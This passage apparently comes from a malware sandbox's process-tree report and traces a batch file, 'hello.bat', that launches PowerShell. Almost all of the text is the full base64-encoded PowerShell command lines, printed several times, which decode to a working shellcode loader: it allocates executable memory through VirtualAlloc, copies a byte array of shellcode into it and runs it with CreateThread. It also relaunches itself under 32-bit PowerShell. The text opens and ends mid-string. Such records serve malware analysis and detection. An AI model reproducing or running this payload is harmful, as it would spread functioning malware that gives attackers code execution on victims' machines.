wBJAG4AdABQAHQAcgBdACgAJABVAGYAbQB5AC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABVAGYAbQB5ACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7AA==
4⤵
PID:3524

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wqkrwz2q\wqkrwz2q.cmdline"
5⤵
PID:6976

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2AF6.tmp" "c:\Users\Admin\AppData\Local\Temp\wqkrwz2q\CSC95A1B7BA686A400F8AF8BE963BFCAE8F.TMP"
6⤵
PID:7024

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\hello.bat" "
1⤵
PID:8468

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -w 1 -C "sv lI -;sv mJz ec;sv qgU ((gv lI).value.toString()+(gv mJz).value.toString());powershell (gv qgU).value.toString() 'JABGAFEAcwAgAD0AIAAnACQAWQBmAEEAagAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABZAGYAQQBqACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGIAZQAsADAAeAAxADMALAAwAHgAZAA4ACwAMAB4AGMAYQAsADAAeAAxAGUALAAwAHgAZABiACwAMAB4AGMAZgAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQBiACwAMAB4ADIAOQAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQAYgAsADAAeAA4ADMALAAwAHgAYwAzACwAMAB4ADAANAAsADAAeAAzADEALAAwAHgANwAzACwAMAB4ADAAZQAsADAAeAAwADMALAAwAHgANgAwACwAMAB4AGQANgAsADAAeAAyADgALAAwAHgAZQBiACwAMAB4ADcAYQAsADAAeAAwAGUALAAwAHgAMgAzACwAMAB4ADEANAAsADAAeAA4ADIALAAwAHgAYwBmACwAMAB4ADUAYwAsADAAeAA5AGMALAAwAHgANgA3ACwAMAB4AGYAZQAsADAAeAA0AGUALAAwAHgAZgBhACwAMAB4AGUAYwAsADAAeAA1ADMALAAwAHgANQBmACwAMAB4ADgAOAAsADAAeABhADAALAAwAHgANQBmACwAMAB4ADEANAAsADAAeABkAGMALAAwAHgANQAwACwAMAB4AGUAYgAsADAAeAA1ADgALAAwAHgAYwA5ACwAMAB4ADYAOQAsADAAeAAxADQALAAwAHgAOQAzACwAMAB4AGIAZQAsADAAeABjADMALAAwAHgAYwBjACwAMAB4ADkAZAAsADAAeAAwADAALAAwAHgANwBmACwAMAB4ADIAYwAsADAAeABiAGYALAAwAHgAZgBjACwAMAB4ADcAZAAsADAAeAA2ADEALAAwAHgAMQBmACwAMAB4ADMAYwAsADAAeAA0AGUALAAwAHgANwA0ACwAMAB4ADUAZQAsADAAeAA3ADkALAAwAHgAMQA5ACwAMAB4AGYAMgAsADAAeAA4AGYALAAwAHgAZAA3ACwAMAB4ADEAMgAsADAAeABhAGUALAAwAHgANQBmACwAMAB4ADUAMwAsADAAeAA2ADYALAAwAHgANwAzACwAMAB4ADYAMQAsADAAeABiADMALAAwAHgAMwAxACwAMAB4ADAAMAAsADAAeAAyADEALAAwAHgANABiACwAMAB4ADMAOAAsADAAeABkADYALAAwAHgAZAA2ACwAMAB4AGUANwAsADAAeAA0ADMALAAwAHgAMAA3ACwAMAB4ADkAZAAsADAAeABhADAALAAwAHgANgAzACwAMAB4AGYANwAsADAAeAAyADkALAAwAHgAMQA4ACwAMAB4ADcAYgAsADAAeABmADYALAAwAHgAZgBlACwAMAB4ADEAYwAsADAAeABiADIALAAwAHgAOABjACwAMAB4ADMAYwAsADAAeAAyAGUALAAwAHgAYgBiACwAMAB4ADIANAAsADAAeABiADYALAAwAHgANgA0ACwAMAB4AGMAOAAsADAAeABiADYALAAwAHgAMQBlACwAMAB4AGIANQAsADAAeAAwAGUALAAwAHgANwA5ACwAMAB4ADUAMQAsADAAeABiAGIALAAwAHgAMgAyACwAMAB4ADcAYgAsADAAeABhADkALAAwAHgAZgBjACwAMAB4AGQAYQAsADAAeAAwADkALAAwAHgAYwAxACwAMAB4AGYAZQAsADAAeAA2ADcALAAwAHgAMABhACwAMAB4ADEAMgAsADAAeAA3AGMALAAwAHgAYgAzACwAMAB4ADkAZgAsADAAeAA4ADUALAAwAHgAMgA2ACwAMAB4ADMAMAAsADAAeAAwADcALAAwAHgANgAyACwAMAB4AGQANgAsADAAeAA5ADUALAAwAHgAZABlACwAMAB4AGUAMQAsADAAeABkADQALAAwAHgANQAyACwAMAB4ADkANAAsADAAeABhAGUALAAwAHgAZgA4ACwAMAB4ADYANQAsADAAeAA3ADkALAAwAHgAYwA1ACwAMAB4ADAANQAsADAAeABlAGUALAAwAHgANwBjACwAMAB4ADAAYQAsADAAeAA4AGMALAAwAHgAYgA0ACwAMAB4ADUAYQAsADAAeAA4AGUALAAwAHgAZAA0ACwAMAB4ADYAZgAsADAAeABjADIALAAwAHgAOQA3ACwAMAB4AGIAMAAsADAAeABkAGUALAAwAHgAZgBiACwAMAB4AGMAOAAsADAAeAAxAGQALAAwAHgAYgBmACwAMAB4ADUAOQAsADAAeAA4ADIALAAwAHgAOABjACwAMAB4AGQANgAsADAAeABkAGUALAAwAHgANgBiACwAMAB4ADQAZgAsADAAeABkADcALAAwAHgAOAAyACwAMAB4AGYAYgAsADAAeAA4ADMALAAwAHgAMQA1ACwAMAB4ADMAZAAsADAAeABmAGMALAAwAHgAOABiACwAMAB4ADIAZQAsADAAeAA0AGUALAAwAHgAYwBlACwAMAB4ADEANAAsADAAeAA4ADQALAAwAHgAZAA4ACwAMAB4ADYAMgAsADAAeABkAGMALAAwAHgAMAAyACwAMAB4ADEAZQAsADAAeABmADIALAAwAHgAYwBhACwAMAB4AGIANQAsADAAeABmADAALAAwAHgAYgBjACwAMAB4ADkAYgAsADAAeAA0ADgALAAwAHgAZgAxACwAMAB4AGIAYwAsADAAeABiADIALAAwAHgAOABlACwAMAB4AGEANQAsADAAeABlAGMALAAwAHgAYQBjACwAMAB4ADIANwAsADAAeABjADYALAAwAHgANgA2ACwAMAB4ADIAZAAsADAAeABjADgALAAwAHgAMQAzACwAMAB4ADEAMgAsADAAeAAyADcALAAwAHgANQBlACwAMAB4ADUAYwAsADAAeAA0AGIALAAwAHgANgBmACwAMAB4ADEAZQAsADAAeAAzADQALAAwAHgAOABlACwAMAB4ADkAMAAsADAAeAAxAGEALAAwAHgANwA5ACwAMAB4ADAANwAsADAAeAA3ADYALAAwAHgANwAyACwAMAB4AGQAMQAsADAAeAA0ADgALAAwAHgAMgA3ACwAMAB4ADMAMgAsADAAeAA4ADEALAAwAHgAMgA4ACwAMAB4ADkANwAsADAAeABkAGEALAAwAHgAYwBiACwAMAB4AGEANgAsADAAeABjADgALAAwAHgAZgBhACwAMAB4AGYAMwAsADAAeAA2AGMALAAwAHgANgAxACwAMAB4ADkAMAAsADAAeAAxAGIALAAwAHgAZAA5ACwAMAB4AGQAOQAsADAAeAAwAGMALAAwAHgAOAA1ACwAMAB4ADQAMAAsADAAeAA5ADEALAAwAHgAYQBkACwAMAB4ADQAYQAsADAAeAA1AGYALAAwAHgAZABmACwAMAB4AGUAZAAsADAAeABjADEALAAwAHgANgBjACwAMAB4ADEAZgAsADAAeABhADMALAAwAHgAMgAxACwAMAB4ADEAOAAsADAAeAAzADMALAAwAHgANQAzACwAMAB4AGMAMgAsADAAeAA1ADcALAAwAHgANgA5ACwAMAB4AGYANQAsADAAeABkAGQALAAwAHgANABkACwAMAB4ADAANAAsADAAeABmADkALAAwAHgANABiACwAMAB4ADYAYQAsADAAeAA4AGYALAAwAHgAYQBlACwAMAB4AGUAMwAsADAAeAA3ADAALAAwAHgAZgA2ACwAMAB4ADkAOAAsADAAeABhAGIALAAwAHgAOABiACwAMAB4AGQAZAAsADAAeAA5ADMALAAwAHgANgAyACwAMAB4ADEAZQAsADAAeAA5AGUALAAwAHgAYwBiACwAMAB4ADgAYQAsADAAeABjAGUALAAwAHgAMQBlACwAMAB4ADAAYgAsADAAeABkAGQALAAwAHgAOAA0ACwAMAB4ADEAZQAsADAAeAA2ADMALAAwAHgAYgA5ACwAMAB4AGYAYwAsADAAeAA0AGMALAAwAHgAOQA2ACwAMAB4AGMANgAsADAAeAAyADgALAAwAHgAZQAxACwAMAB4ADAAYgAsADAAeAA1ADMALAAwAHgAZAAzACwAMAB4ADUAMAAsADAAeABmADgALAAwAHgAZgA0ACwAMAB4AGIAYgAsADAAeAA1AGUALAAwAHgAMgA3ACwAMAB4ADMAMgAsADAAeAA2ADQALAAwAHgAYQAwACwAMAB4ADAAMgAsADAAeABjADIALAAwAHgANQA4ACwAMAB4ADcANwAsADAAeAA2AGEALAAwAHgAYgAwACwAMAB4AGIAMAAsADAAeAA0AGIAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAFUAZgBtAHkAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAFUAZgBtAHkALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAFUAZgBtAHkALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABGAFEAcwApACkAOwAkAHIAUQB5AGIAIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAbgBpAHUAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAbgBpAHUAIAAkAHIAUQB5AGIAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAcgBRAHkAYgAgACQAZQAiADsAfQA='"
2⤵
PID:8564

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ec JABGAFEAcwAgAD0AIAAnACQAWQBmAEEAagAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABZAGYAQQBqACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGIAZQAsADAAeAAxADMALAAwAHgAZAA4ACwAMAB4AGMAYQAsADAAeAAxAGUALAAwAHgAZABiACwAMAB4AGMAZgAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQBiACwAMAB4ADIAOQAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQAYgAsADAAeAA4ADMALAAwAHgAYwAzACwAMAB4ADAANAAsADAAeAAzADEALAAwAHgANwAzACwAMAB4ADAAZQAsADAAeAAwADMALAAwAHgANgAwACwAMAB4AGQANgAsADAAeAAyADgALAAwAHgAZQBiACwAMAB4ADcAYQAsADAAeAAwAGUALAAwAHgAMgAzACwAMAB4ADEANAAsADAAeAA4ADIALAAwAHgAYwBmACwAMAB4ADUAYwAsADAAeAA5AGMALAAwAHgANgA3ACwAMAB4AGYAZQAsADAAeAA0AGUALAAwAHgAZgBhACwAMAB4AGUAYwAsADAAeAA1ADMALAAwAHgANQBmACwAMAB4ADgAOAAsADAAeABhADAALAAwAHgANQBmACwAMAB4ADEANAAsADAAeABkAGMALAAwAHgANQAwACwAMAB4AGUAYgAsADAAeAA1ADgALAAwAHgAYwA5ACwAMAB4ADYAOQAsADAAeAAxADQALAAwAHgAOQAzACwAMAB4AGIAZQAsADAAeABjADMALAAwAHgAYwBjACwAMAB4ADkAZAAsADAAeAAwADAALAAwAHgANwBmACwAMAB4ADIAYwAsADAAeABiAGYALAAwAHgAZgBjACwAMAB4ADcAZAAsADAAeAA2ADEALAAwAHgAMQBmACwAMAB4ADMAYwAsADAAeAA0AGUALAAwAHgANwA0ACwAMAB4ADUAZQAsADAAeAA3ADkALAAwAHgAMQA5ACwAMAB4AGYAMgAsADAAeAA4AGYALAAwAHgAZAA3ACwAMAB4ADEAMgAsADAAeABhAGUALAAwAHgANQBmACwAMAB4ADUAMwAsADAAeAA2ADYALAAwAHgANwAzACwAMAB4ADYAMQAsADAAeABiADMALAAwAHgAMwAxACwAMAB4ADAAMAAsADAAeAAyADEALAAwAHgANABiACwAMAB4ADMAOAAsADAAeABkADYALAAwAHgAZAA2ACwAMAB4AGUANwAsADAAeAA0ADMALAAwAHgAMAA3ACwAMAB4ADkAZAAsADAAeABhADAALAAwAHgANgAzACwAMAB4AGYANwAsADAAeAAyADkALAAwAHgAMQA4ACwAMAB4ADcAYgAsADAAeABmADYALAAwAHgAZgBlACwAMAB4ADEAYwAsADAAeABiADIALAAwAHgAOABjACwAMAB4ADMAYwAsADAAeAAyAGUALAAwAHgAYgBiACwAMAB4ADIANAAsADAAeABiADYALAAwAHgANgA0ACwAMAB4AGMAOAAsADAAeABiADYALAAwAHgAMQBlACwAMAB4AGIANQAsADAAeAAwAGUALAAwAHgANwA5ACwAMAB4ADUAMQAsADAAeABiAGIALAAwAHgAMgAyACwAMAB4ADcAYgAsADAAeABhADkALAAwAHgAZgBjACwAMAB4AGQAYQAsADAAeAAwADkALAAwAHgAYwAxACwAMAB4AGYAZQAsADAAeAA2ADcALAAwAHgAMABhACwAMAB4ADEAMgAsADAAeAA3AGMALAAwAHgAYgAzACwAMAB4ADkAZgAsADAAeAA4ADUALAAwAHgAMgA2ACwAMAB4ADMAMAAsADAAeAAwADcALAAwAHgANgAyACwAMAB4AGQANgAsADAAeAA5ADUALAAwAHgAZABlACwAMAB4AGUAMQAsADAAeABkADQALAAwAHgANQAyACwAMAB4ADkANAAsADAAeABhAGUALAAwAHgAZgA4ACwAMAB4ADYANQAsADAAeAA3ADkALAAwAHgAYwA1ACwAMAB4ADAANQAsADAAeABlAGUALAAwAHgANwBjACwAMAB4ADAAYQAsADAAeAA4AGMALAAwAHgAYgA0ACwAMAB4ADUAYQAsADAAeAA4AGUALAAwAHgAZAA0ACwAMAB4ADYAZgAsADAAeABjADIALAAwAHgAOQA3ACwAMAB4AGIAMAAsADAAeABkAGUALAAwAHgAZgBiACwAMAB4AGMAOAAsADAAeAAxAGQALAAwAHgAYgBmACwAMAB4ADUAOQAsADAAeAA4ADIALAAwAHgAOABjACwAMAB4AGQANgAsADAAeABkAGUALAAwAHgANgBiACwAMAB4ADQAZgAsADAAeABkADcALAAwAHgAOAAyACwAMAB4AGYAYgAsADAAeAA4ADMALAAwAHgAMQA1ACwAMAB4ADMAZAAsADAAeABmAGMALAAwAHgAOABiACwAMAB4ADIAZQAsADAAeAA0AGUALAAwAHgAYwBlACwAMAB4ADEANAAsADAAeAA4ADQALAAwAHgAZAA4ACwAMAB4ADYAMgAsADAAeABkAGMALAAwAHgAMAAyACwAMAB4ADEAZQAsADAAeABmADIALAAwAHgAYwBhACwAMAB4AGIANQAsADAAeABmADAALAAwAHgAYgBjACwAMAB4ADkAYgAsADAAeAA0ADgALAAwAHgAZgAxACwAMAB4AGIAYwAsADAAeABiADIALAAwAHgAOABlACwAMAB4AGEANQAsADAAeABlAGMALAAwAHgAYQBjACwAMAB4ADIANwAsADAAeABjADYALAAwAHgANgA2ACwAMAB4ADIAZAAsADAAeABjADgALAAwAHgAMQAzACwAMAB4ADEAMgAsADAAeAAyADcALAAwAHgANQBlACwAMAB4ADUAYwAsADAAeAA0AGIALAAwAHgANgBmACwAMAB4ADEAZQAsADAAeAAzADQALAAwAHgAOABlACwAMAB4ADkAMAAsADAAeAAxAGEALAAwAHgANwA5ACwAMAB4ADAANwAsADAAeAA3ADYALAAwAHgANwAyACwAMAB4AGQAMQAsADAAeAA0ADgALAAwAHgAMgA3ACwAMAB4ADMAMgAsADAAeAA4ADEALAAwAHgAMgA4ACwAMAB4ADkANwAsADAAeABkAGEALAAwAHgAYwBiACwAMAB4AGEANgAsADAAeABjADgALAAwAHgAZgBhACwAMAB4AGYAMwAsADAAeAA2AGMALAAwAHgANgAxACwAMAB4ADkAMAAsADAAeAAxAGIALAAwAHgAZAA5ACwAMAB4AGQAOQAsADAAeAAwAGMALAAwAHgAOAA1ACwAMAB4ADQAMAAsADAAeAA5ADEALAAwAHgAYQBkACwAMAB4ADQAYQAsADAAeAA1AGYALAAwAHgAZABmACwAMAB4AGUAZAAsADAAeABjADEALAAwAHgANgBjACwAMAB4ADEAZgAsADAAeABhADMALAAwAHgAMgAxACwAMAB4ADEAOAAsADAAeAAzADMALAAwAHgANQAzACwAMAB4AGMAMgAsADAAeAA1ADcALAAwAHgANgA5ACwAMAB4AGYANQAsADAAeABkAGQALAAwAHgANABkACwAMAB4ADAANAAsADAAeABmADkALAAwAHgANABiACwAMAB4ADYAYQAsADAAeAA4AGYALAAwAHgAYQBlACwAMAB4AGUAMwAsADAAeAA3ADAALAAwAHgAZgA2ACwAMAB4ADkAOAAsADAAeABhAGIALAAwAHgAOABiACwAMAB4AGQAZAAsADAAeAA5ADMALAAwAHgANgAyACwAMAB4ADEAZQAsADAAeAA5AGUALAAwAHgAYwBiACwAMAB4ADgAYQAsADAAeABjAGUALAAwAHgAMQBlACwAMAB4ADAAYgAsADAAeABkAGQALAAwAHgAOAA0ACwAMAB4ADEAZQAsADAAeAA2ADMALAAwAHgAYgA5ACwAMAB4AGYAYwAsADAAeAA0AGMALAAwAHgAOQA2ACwAMAB4AGMANgAsADAAeAAyADgALAAwAHgAZQAxACwAMAB4ADAAYgAsADAAeAA1ADMALAAwAHgAZAAzACwAMAB4ADUAMAAsADAAeABmADgALAAwAHgAZgA0ACwAMAB4AGIAYgAsADAAeAA1AGUALAAwAHgAMgA3ACwAMAB4ADMAMgAsADAAeAA2ADQALAAwAHgAYQAwACwAMAB4ADAAMgAsADAAeABjADIALAAwAHgANQA4ACwAMAB4ADcANwAsADAAeAA2AGEALAAwAHgAYgAwACwAMAB4AGIAMAAsADAAeAA0AGIAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAFUAZgBtAHkAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAFUAZgBtAHkALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAFUAZgBtAHkALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABGAFEAcwApACkAOwAkAHIAUQB5AGIAIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAbgBpAHUAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAbgBpAHUAIAAkAHIAUQB5AGIAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAcgBRAHkAYgAgACQAZQAiADsAfQA=
3⤵
PID:8864

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -ec JABZAGYAQQBqACAAPQAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQ